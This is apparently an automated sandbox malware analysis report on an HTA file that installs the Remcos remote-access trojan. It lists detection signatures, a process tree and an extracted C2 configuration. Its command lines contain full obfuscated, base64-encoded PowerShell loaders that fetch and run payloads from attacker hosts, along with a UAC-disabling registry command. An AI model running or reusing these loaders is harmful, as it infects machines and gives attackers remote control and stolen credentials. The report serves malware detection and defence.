Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nicegirlforyou.hta

Overview

General Information

Sample name:nicegirlforyou.hta
Analysis ID:1572998
MD5:fea592b533e97736debe379b886595a7
SHA1:70eb330d0db30762edc64d262b7f1cfc24c8b540
SHA256:fbda5655a80445279f376d372348b57ab9dbadae81e69df823a6949a412cbe96
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 3512 cmdline: mshta.exe "C:\Users\user\Desktop\nicegirlforyou.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 1436 cmdline: "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4824 cmdline: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 5092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 6784 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFAE8.tmp" "c:\Users\user\AppData\Local\Temp\gxlowwdn\CSC56436D359159402F8D448B12D32335C6.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 1776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 2704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 3516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • CasPol.exe (PID: 6860 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["rmcnewprojectadd.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-QEQMVZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
nicegirlforyou.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6b6f8:$a1: Remcos restarted by watchdog!
          • 0x6bc70:$a3: %02i:%02i:%02i:%03i
          0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
          • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x65a04:$str_b2: Executing file:
          • 0x6683c:$str_b3: GetDirectListeningPort
          • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x66380:$str_b7: \update.vbs
          • 0x65a2c:$str_b9: Downloaded file:
          • 0x65a18:$str_b10: Downloading file:
          • 0x65abc:$str_b12: Failed to upload file:
          • 0x66804:$str_b13: StartForward
          • 0x66824:$str_b14: StopForward
          • 0x662d8:$str_b15: fso.DeleteFile "
          • 0x6626c:$str_b16: On Error Resume Next
          • 0x66308:$str_b17: fso.DeleteFolder "
          • 0x65aac:$str_b18: Uploaded file:
          • 0x65a6c:$str_b19: Unable to delete:
          • 0x662a0:$str_b20: while fso.FileExists("
          • 0x65f49:$str_c0: [Firefox StoredLogins not found]
          Click to see the 16 entries
          SourceRuleDescriptionAuthorStrings
          11.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            11.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              11.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                11.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6b6f8:$a1: Remcos restarted by watchdog!
                • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                11.2.CasPol.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x65a04:$str_b2: Executing file:
                • 0x6683c:$str_b3: GetDirectListeningPort
                • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x66380:$str_b7: \update.vbs
                • 0x65a2c:$str_b9: Downloaded file:
                • 0x65a18:$str_b10: Downloading file:
                • 0x65abc:$str_b12: Failed to upload file:
                • 0x66804:$str_b13: StartForward
                • 0x66824:$str_b14: StopForward
                • 0x662d8:$str_b15: fso.DeleteFile "
                • 0x6626c:$str_b16: On Error Resume Next
                • 0x66308:$str_b17: fso.DeleteFolder "
                • 0x65aac:$str_b18: Uploaded file:
                • 0x65a6c:$str_b19: Unable to delete:
                • 0x662a0:$str_b20: while fso.FileExists("
                • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                Click to see the 7 entries
                SourceRuleDescriptionAuthorStrings
                amsi32_2704.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                  amsi32_2704.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9y
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4824, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , ProcessId: 1776, ProcessName: wscript.exe
